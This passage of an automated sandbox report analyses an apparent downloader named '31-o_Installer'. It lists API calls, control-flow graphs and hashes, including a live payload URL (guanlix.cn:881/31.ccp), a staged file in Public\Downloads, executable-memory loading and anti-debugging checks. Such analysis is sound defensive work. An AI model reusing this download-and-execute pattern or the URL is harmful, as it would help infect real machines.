                • Instruction Fuzzy Hash: A4418231921A05DFCF25CF94C980AEEB7F5FF58710F24051AE552A7280D7B1AD98CB61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 125 2e700cd-2e700e2 127 2e700e4-2e700e5 125->127 128 2e700ea-2e700fb 125->128 129 2e701af-2e701b2 127->129 131 2e70101-2e7010c 128->131 132 2e701ab 128->132 131->132 133 2e70112-2e70120 VirtualProtect 131->133 134 2e701ad-2e701ae 132->134 133->132 135 2e70126-2e70160 call 2e7161e call 2e718bb VirtualProtect 133->135 134->129 135->132 141 2e70162-2e7016e 135->141 141->132 142 2e70170-2e7017e VirtualProtect 141->142 142->132 143 2e70180-2e701a9 call 2e7161e call 2e718bb VirtualProtect 142->143 143->134
                APIs
                • VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 02E7011B
                • VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 02E7014E
                • VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 02E70179
                • VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 02E701A3
                Memory Dump Source
                • Source File: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2e60000_31-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                • Instruction ID: f8e983ecc477ba9925cf5e41952c1660d494a9f6b9303453316a321a9314775f
                • Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                • Instruction Fuzzy Hash: AA2153B22447496FE320DA65CC88F7B77ECEB88705B04983DBA87D1551EB74E5058A70

                Control-flow Graph

                APIs
                  • Part of subcall function 00261186: __time64.LIBCMT ref: 0026118E
                  • Part of subcall function 00261186: _rand.LIBCMT ref: 0026119E
                  • Part of subcall function 00261186: _rand.LIBCMT ref: 002611AD
                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00262F4E
                  • Part of subcall function 00262E58: __EH_prolog.LIBCMT ref: 00262E5D
                  • Part of subcall function 00262E58: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00262E79
                  • Part of subcall function 00262E58: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00262E96
                  • Part of subcall function 00262E58: InternetReadFile.WININET(?,?,00001000,?), ref: 00262EFC
                  • Part of subcall function 00262E58: InternetCloseHandle.WININET(?), ref: 00262F12
                  • Part of subcall function 00262E58: InternetCloseHandle.WININET(?), ref: 00262F2A
                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00262F6F
                  • Part of subcall function 0026168B: _wprintf.LIBCMT ref: 0026169D
                  • Part of subcall function 0026168B: _wprintf.LIBCMT ref: 002616B5
                  • Part of subcall function 0026168B: _wprintf.LIBCMT ref: 002616CD
                  • Part of subcall function 0026168B: _wprintf.LIBCMT ref: 002616E5
                  • Part of subcall function 002611E1: GetTickCount64.KERNEL32 ref: 002611EF
                  • Part of subcall function 002611E1: Sleep.KERNEL32(0000012C), ref: 002611F9
                  • Part of subcall function 002611E1: GetTickCount64.KERNEL32 ref: 002611FF
                  • Part of subcall function 002611E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00261244
                  • Part of subcall function 002611E1: GetFileSize.KERNEL32(00000000,00000000), ref: 0026124E
                  • Part of subcall function 002611E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 0026125F
                  • Part of subcall function 002611E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00261270
                  • Part of subcall function 002611E1: CloseHandle.KERNEL32(00000000), ref: 00261277
                Strings
                • C:\Users\Public\Downloads\ind.cod, xrefs: 00262F54
                • http://guanlix.cn:881/31.ccp, xrefs: 00262F59
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Internet$File_wprintf$CloseHandleVirtual$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
                • String ID: C:\Users\Public\Downloads\ind.cod$http://guanlix.cn:881/31.ccp
                • API String ID: 2148924518-2732001866
                • Opcode ID: 8034c467d5ce1137f2f85c04ec11cfea03ebdd164fa63e7de391422458f4cfab
                • Instruction ID: ac54ba6bc0e3c31e38724b2191e5a9d8e2113d51b61995f2df14cab49817a53c
                • Opcode Fuzzy Hash: 8034c467d5ce1137f2f85c04ec11cfea03ebdd164fa63e7de391422458f4cfab
                • Instruction Fuzzy Hash: 1AE0C2722B43507AF25073B06C0FF9A011C8B01B41F148010F20CA80C1D9D138F28E68

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 157 2e6fb37-2e6fb76 call 2e71628 * 2 162 2e6fd91 157->162 163 2e6fb7c-2e6fb7e 157->163 165 2e6fd94-2e6fd9b 162->165 163->162 164 2e6fb84-2e6fb95 VirtualAlloc 163->164 164->162 166 2e6fb9b-2e6fbe9 call 2e718bb call 2e718df call 2e717ba call 2e71695 164->166 175 2e6fd3e-2e6fd4a 166->175 176 2e6fbef-2e6fbf5 166->176 177 2e6fd4c-2e6fd54 175->177 178 2e6fd7a-2e6fd8f call 2e718df 175->178 176->175 179 2e6fbfb-2e6fc15 call 2e71628 176->179 177->178 180 2e6fd56-2e6fd73 call 2e718df 177->180 178->165 179->162 187 2e6fc1b-2e6fc23 179->187 180->178 189 2e6fc25 187->189 190 2e6fc3b-2e6fc41 187->190 191 2e6fc2b-2e6fc39 LoadLibraryA 189->191 192 2e6fc77-2e6fc82 190->192 193 2e6fc43-2e6fc46 190->193 191->190 191->191 196 2e6fc84-2e6fc8d call 2e701b3 192->196 197 2e6fc99-2e6fca2 192->197 195 2e6fc49-2e6fc62 call 2e71628 193->195 207 2e6fd3a 195->207 208 2e6fc68-2e6fc75 195->208 196->207 211 2e6fc93 196->211 200 2e6fca6-2e6fcad 197->200 201 2e6fca4 197->201 204 2e6fcd5-2e6fcd8 200->204 205 2e6fcaf-2e6fcb8 call 2e6ffe7 200->205 201->200 209 2e6fd33-2e6fd34 call 2e70eca 204->209 210 2e6fcda-2e6fcdd 204->210 215 2e6fcc2-2e6fcc3 call 2e700cd 205->215 216 2e6fcba-2e6fcc0 205->216 207->175 208->192 208->195 219 2e6fd39 209->219 210->209 213 2e6fcdf-2e6fce2 210->213 211->197 217 2e6fd07-2e6fd16 call 2e709f9 213->217 218 2e6fce4-2e6fce6 213->218 223 2e6fcc8-2e6fccb 215->223 216->207 216->215 229 2e6fd25-2e6fd31 call 2e7058d 217->229 230 2e6fd18-2e6fd1e call 2e70c04 217->230 218->217 222 2e6fce8-2e6fceb 218->222 219->207 225 2e6fcff-2e6fd05 call 2e71351 222->225 226 2e6fced-2e6fcf0 222->226 223->204 228 2e6fccd-2e6fcd3 223->228 225->219 226->225 231 2e6fcf2-2e6fcf5 226->231 228->204 228->207 229->219 236 2e6fd23-2e6fd24 230->236 231->207 235 2e6fcf7-2e6fcfd call 2e714e2 231->235 235->219 236->229
                APIs
                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02E6FB8F
                • LoadLibraryA.KERNEL32(00000238), ref: 02E6FC2C
                Memory Dump Source
                • Source File: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2e60000_31-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: AllocLibraryLoadVirtual
                • String ID:
                • API String ID: 3550616410-0
                • Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                • Instruction ID: 7bb166a9120c5aee43c93daf5f6647e4f474ae97015972200c91f0c7b15571ac
                • Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                • Instruction Fuzzy Hash: 1461E2325C0B02ABCB319AA0DC88BABB7AAFF06358F14A919F65A45840DB31F151CF51

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 240 265902-26591e call 26a9b0 243 265935-265939 240->243 244 265920-265933 call 26a95f call 26a90d 240->244 245 26593b 243->245 246 265948-265954 call 2650e4 call 265895 243->246 251 265942-265947 call 26a9f5 244->251 248 26593f 245->248 258 265959-265969 call 26596e 246->258 248->251 258->248
                APIs
                  • Part of subcall function 0026A95F: __getptd_noexit.LIBCMT ref: 0026A95F
                • __lock_file.LIBCMT ref: 00265949
                  • Part of subcall function 002650E4: __lock.LIBCMT ref: 00265109
                • __fclose_nolock.LIBCMT ref: 00265954
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: fdf473249aa9fe9cafd829e67a9dd94bdd3d2c92bdd31f322e9f8c181ba6a183
                • Instruction ID: 319d97190e8e9911ce18251753903ab8c4d772859bc70eefbf03d87fcc833b07
                • Opcode Fuzzy Hash: fdf473249aa9fe9cafd829e67a9dd94bdd3d2c92bdd31f322e9f8c181ba6a183
                • Instruction Fuzzy Hash: 14F09030832B26DADB10AB74880675E7BA06F01335F358248A475AB0C1C7788AE19ED6

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 261 26184b-26185e 262 261864 261->262 263 261909-261911 261->263 264 261866-261869 262->264 265 26186f-261871 262->265 264->263 264->265 266 261875-26187a 265->266 267 261881-261888 266->267 268 26187c-26187f 266->268 269 26188a 267->269 270 2618cb-2618d6 call 26297f 267->270 268->267 271 261890-261893 269->271 272 26188c-26188e 269->272 275 2618d9-2618dc 270->275 273 261895 271->273 274 2618a2-2618c9 call 263dd0 271->274 272->270 272->271 276 261897-26189a 273->276 277 26189c-26189f 273->277 282 2618f1-2618f5 274->282 279 261907-261908 275->279 280 2618de-2618ed 275->280 276->274 276->277 277->274 279->263 280->282 283 261873 282->283 284 2618fb 282->284 283->266 284->279 285 2618fd-261901 284->285 285->279 285->283
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
                • Instruction ID: 9e5ebe943b15ef0442c3ce12cd92ef6707bdb9243a7053b5f1b3c79c26787d4a
                • Opcode Fuzzy Hash: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
                • Instruction Fuzzy Hash: 4331483592164AEFDB50CF29C84459DB7B5FF09365F18826AE82487191E370EEB0CF80

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 287 5337950-5337979 290 533797b-533797e 287->290 291 533797f-53379d6 287->291 294 53379de-5337a0c GlobalMemoryStatusEx 291->294 295 5337a15-5337a3d 294->295 296 5337a0e-5337a14 294->296 296->295
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05337912), ref: 053379FF
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: fe54cc108ba6b4596eb5eb1e9332da7fe00b54c28fba030e6b518070866e0ab0
                • Instruction ID: 4f80ce55e28d67a21f06ce1f0d7e10944d4fdd3b8ad73769a900c5d32d2ed1a1
                • Opcode Fuzzy Hash: fe54cc108ba6b4596eb5eb1e9332da7fe00b54c28fba030e6b518070866e0ab0
                • Instruction Fuzzy Hash: 41218BB1C0469A9FDB10CFAAC4447AEFBF0EF48320F15856AD944A3340E778A955CFA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 299 262d2e-262d49 call 264948 303 262d62-262da6 call 262813 call 261fa3 call 262483 299->303 304 262d4b-262d5b 299->304 311 262dc4-262dd3 303->311 312 262da8-262db8 303->312 304->303 313 262dbd-262dbf call 26153b 312->313 314 262dba 312->314 313->311 314->313
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6d623bffb95673ef404d7dba4ab93791444f4260a7974a059246245bf3e6eafa
                • Instruction ID: e3a0e3511b210310920cf41dbedc91ca60764561306968301a99aeb6cd33c281
                • Opcode Fuzzy Hash: 6d623bffb95673ef404d7dba4ab93791444f4260a7974a059246245bf3e6eafa
                • Instruction Fuzzy Hash: 08115BB1A20615EFDB20DF88C885AAAF7F9FB44304F00845EF44697241C7B09DA0CB60

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 316 262d33-262d49 call 264948 319 262d62-262d86 call 262813 call 261fa3 316->319 320 262d4b-262d5b 316->320 324 262d8b-262d9e call 262483 319->324 320->319 326 262da3-262da6 324->326 327 262dc4-262dd3 326->327 328 262da8-262db8 326->328 329 262dbd-262dbf call 26153b 328->329 330 262dba 328->330 329->327 330->329
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 5944f05017620e08dad4ea7e04f1f10a232479e15c16545bb876be5740193df0
                • Instruction ID: 97fc7ebc3178507977688060ef75c2ba6af662d2175f7df9391a1cdbaf36aae5
                • Opcode Fuzzy Hash: 5944f05017620e08dad4ea7e04f1f10a232479e15c16545bb876be5740193df0
                • Instruction Fuzzy Hash: F6113DB1A20615EFDB24DF98C885AAEF7F9FB44304F14845EF44697241C7B19D64CB60

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 332 53374b0-5337a0c GlobalMemoryStatusEx 335 5337a15-5337a3d 332->335 336 5337a0e-5337a14 332->336 336->335
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05337912), ref: 053379FF
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: 99dfdd613a31d396efe835985a063433f38f3dfdf10034d10a507325ea465174
                • Instruction ID: e0307bfe6f8425dc5fef33b8e3c83bac652c48645920b26519135f5b002411b7
                • Opcode Fuzzy Hash: 99dfdd613a31d396efe835985a063433f38f3dfdf10034d10a507325ea465174
                • Instruction Fuzzy Hash: 091136B1C006599BDB10CF9AC44479EFBB4EF48224F14856AE918A7200D7B8AA50CFA1
                APIs
                • __EH_prolog.LIBCMT ref: 00262488
                  • Part of subcall function 0026130B: std::locale::facet::_Incref.LIBCPMT ref: 0026131E
                  • Part of subcall function 0026235F: __EH_prolog.LIBCMT ref: 00262364
                  • Part of subcall function 0026235F: std::_Lockit::_Lockit.LIBCPMT ref: 00262373
                  • Part of subcall function 0026235F: int.LIBCPMT ref: 0026238A
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                • String ID:
                • API String ID: 3551698239-0
                • Opcode ID: daa1db195fd6bd9b4c7fd87503bd1550d330d36337d29b589b1b8e024949721c
                • Instruction ID: 8b7638229a1c853bbbbfecff4098855cefb7e5697c07b4a21b743ff378179aa8
                • Opcode Fuzzy Hash: daa1db195fd6bd9b4c7fd87503bd1550d330d36337d29b589b1b8e024949721c
                • Instruction Fuzzy Hash: 6EF09032A70954EBCF15EF58CC02BAE33A9AF14711F048429F806D2185DFB49AF4CB90
                APIs
                • __EH_prolog.LIBCMT ref: 00262488
                  • Part of subcall function 0026130B: std::locale::facet::_Incref.LIBCPMT ref: 0026131E
                  • Part of subcall function 0026235F: __EH_prolog.LIBCMT ref: 00262364
                  • Part of subcall function 0026235F: std::_Lockit::_Lockit.LIBCPMT ref: 00262373
                  • Part of subcall function 0026235F: int.LIBCPMT ref: 0026238A
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                • String ID:
                • API String ID: 3551698239-0
                • Opcode ID: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
                • Instruction ID: 6edba36c6a11ce6ab369e65031e7b452bcffd907e1ff576e81220937500bcf2f
                • Opcode Fuzzy Hash: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
                • Instruction Fuzzy Hash: A8F09032A70554EFCF15EF64CC02BAE33A9AB14711F044419F805D2585DFB49AF4DB80
                Memory Dump Source
                • Source File: 00000000.00000002.4546926592.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2ebd000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f02593f5c71f8fb5873f24bac622efd7a9d1f85b5450d0391c65630c6dfd2e83
                • Instruction ID: 14f646cb17a2fcf47f970570207e71b4747355b8c71a70e75821f80b3591dca8
                • Opcode Fuzzy Hash: f02593f5c71f8fb5873f24bac622efd7a9d1f85b5450d0391c65630c6dfd2e83
                • Instruction Fuzzy Hash: C02122B6644204EFDB06DF14DDC0BA7BF65FF88328F24C169E90A4B256C336D456CAA1
                Memory Dump Source
                • Source File: 00000000.00000002.4546926592.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2ebd000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2407cf4952b9ec18cec18172483e5790cdfff90552ab70702f4a382f61ab051d
                • Instruction ID: f0a91d47c02d273933418ce2257b099ae496fd619f46c6d5ebae1f596e87ff24
                • Opcode Fuzzy Hash: 2407cf4952b9ec18cec18172483e5790cdfff90552ab70702f4a382f61ab051d
                • Instruction Fuzzy Hash: DA11D076544284CFDB16CF10D9C4B56BF71FF84328F28C6A9D8094B656C33AD45ACBA2
                Memory Dump Source
                • Source File: 00000000.00000002.4546926592.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2ebd000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 347056a5bdf146723faa9c1595d831a98236e5ef93dbb5963f1a18594679a0c0
                • Instruction ID: a85c337205a2d8c368bfb515161684e5761c37c58b301d0b41056b48bd17e3c4
                • Opcode Fuzzy Hash: 347056a5bdf146723faa9c1595d831a98236e5ef93dbb5963f1a18594679a0c0
                • Instruction Fuzzy Hash: E8012D6144E3C05EE7138B258C94756BFB49F43228F19C1DBD9888F1A7C2695849C772
                Memory Dump Source
                • Source File: 00000000.00000002.4546926592.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2ebd000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3301c82ec15e081e71138a6795670485777ed36968cba7148ffefaab1482ae61
                • Instruction ID: da19ace12ae9f390ccba38b7993bd70ba2253228d5128aebcd1303d92cdfeac4
                • Opcode Fuzzy Hash: 3301c82ec15e081e71138a6795670485777ed36968cba7148ffefaab1482ae61
                • Instruction Fuzzy Hash: 01012671449340DAE7124E65CD84BE7BF98DF81378F08D01AEE084B246CBB99841CBB1
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0026FB0A,?,00266AFC,?,000000BC,?,00000001,00000000,00000000), ref: 0026F50C
                • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0026FB0A,?,00266AFC,?,000000BC,?,00000001,00000000,00000000), ref: 0026F535
                • GetACP.KERNEL32(?,?,0026FB0A,?,00266AFC,?,000000BC,?,00000001,00000000), ref: 0026F549
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 8cd45115ed556b41378042bac9eb1b93e2f9dae594d47b891d894a2be8fbedcc
                • Instruction ID: f4a7724de99076206c3b5d99acddd64a298cffda461fcde45d8e2aa4e1e64ae1
                • Opcode Fuzzy Hash: 8cd45115ed556b41378042bac9eb1b93e2f9dae594d47b891d894a2be8fbedcc
                • Instruction Fuzzy Hash: 6F01D431621307BAEF11DF61BD0AB5E72E8AF0235CF504024F106E1080EB70DEE1CA55
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 0026E003
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0026E018
                • UnhandledExceptionFilter.KERNEL32(0027AEF0), ref: 0026E023
                • GetCurrentProcess.KERNEL32(C0000409), ref: 0026E03F
                • TerminateProcess.KERNEL32(00000000), ref: 0026E046
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: 9d6c91a8cb7c2cf23152ab082b22c9f7824e3c50b5fed90094a41e3c137d69f7
                • Instruction ID: e4e5d9b00c6bc5a2cf2bc173bbfbe1e3c4a10aca956edf1db8db8a94beae4fe9
                • Opcode Fuzzy Hash: 9d6c91a8cb7c2cf23152ab082b22c9f7824e3c50b5fed90094a41e3c137d69f7
                • Instruction Fuzzy Hash: B021CDBC822304DFD740DF99FD8D6843BF8BB48751F50409AE90986AA0E7B069E28F05
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0000C74B), ref: 0026C792
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 93cb6415bf114ad55567e616fb640728f5aa25e00c1be4e9abef8cbad01c4376
                • Instruction ID: bc4b028dcd91ca032cb45bcb0891ac8f6f019307ab6044551d43ae4a0e8c6479
                • Opcode Fuzzy Hash: 93cb6415bf114ad55567e616fb640728f5aa25e00c1be4e9abef8cbad01c4376
                • Instruction Fuzzy Hash: B19002B067160046870227746D0E91975955A5960275244506145C4054EBA055D05952
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
